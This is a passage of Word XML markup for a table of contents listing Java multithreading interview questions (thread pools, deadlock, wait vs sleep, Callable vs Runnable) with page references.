        <w:p w14:paraId="3F52FE8A" w14:textId="6CE88C1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4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happens if a thread calls notify() instead of notifyAll()?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307743 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>371</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DFBC0EF" w14:textId="7195AC2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4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create threads using java 1.7 and java 1.8?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307744 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>373</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E2571A1" w14:textId="22B67E0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4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Class level lock and Object level lock?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307745 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>374</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D852167" w14:textId="2535552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4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wait and sleep?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307746 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>375</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="675F4641" w14:textId="284924A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4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read.sleep() method, and what does it do internally?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307747 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>377</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D1723A6" w14:textId="301C4EC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4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Thread and Runnable in Java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307748 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>378</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BBF70B3" w14:textId="0138FB3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4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significance of Executors in Java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307749 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>380</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A532AE4" w14:textId="7619D14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5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the Producer Consumer problem and how would you implement it using wait(), notify() or BlockingQueue?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307750 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>382</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73A13894" w14:textId="4AF41EC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5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Callable and Runnable. When should you use each?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307751 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>385</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B04781C" w14:textId="462545E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5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ForkJoinPool in Java and how does it differ from normal ExecutorService?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>387</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="458084D7" w14:textId="3D5FCC5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5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Deadlock and how do you avoid it in Java Multithreading?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>389</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E750E8F" w14:textId="0F23B34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5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are the ways of blocking the threads in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>393</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BBC77B7" w14:textId="431248D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5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read synchronization in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>395</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28497362" w14:textId="644EEF1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5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are the methods of thread?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>398</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24DC5084" w14:textId="3F6237D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5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read pool? What are the types of thread pool?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>400</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3309B098" w14:textId="0553D86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5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In Thread Pool Executor which data structure is used to store the request data?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15C88C7D" w14:textId="6C2B1A5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5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en we setup a Thread Pool Executor so what will be the ideal count, how many thread we should keep in it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49C26602" w14:textId="52546C5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6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are thread pool methods?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41D04952" w14:textId="404B924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6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create threads in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>406</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E99AC86" w14:textId="42B1DA9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6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start a thread in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>407</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="187C7370" w14:textId="76BDD7A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6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create threads in two different ways?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>409</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="796552BF" w14:textId="135EEE0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6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necessity of thread synchronization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307764 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>410</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F245908" w14:textId="3ECF43B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6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create a Thread pool in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307765 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>412</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70785441" w14:textId="591A009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6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ich method you will override in order to create a thread?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307766 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>414</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53454556" w14:textId="60E7637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6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are all methods present in Thread class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307767 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>415</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2381DAAC" w14:textId="5A8B531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6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do notify methods work in multithreading?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307768 \h </w:instrText>
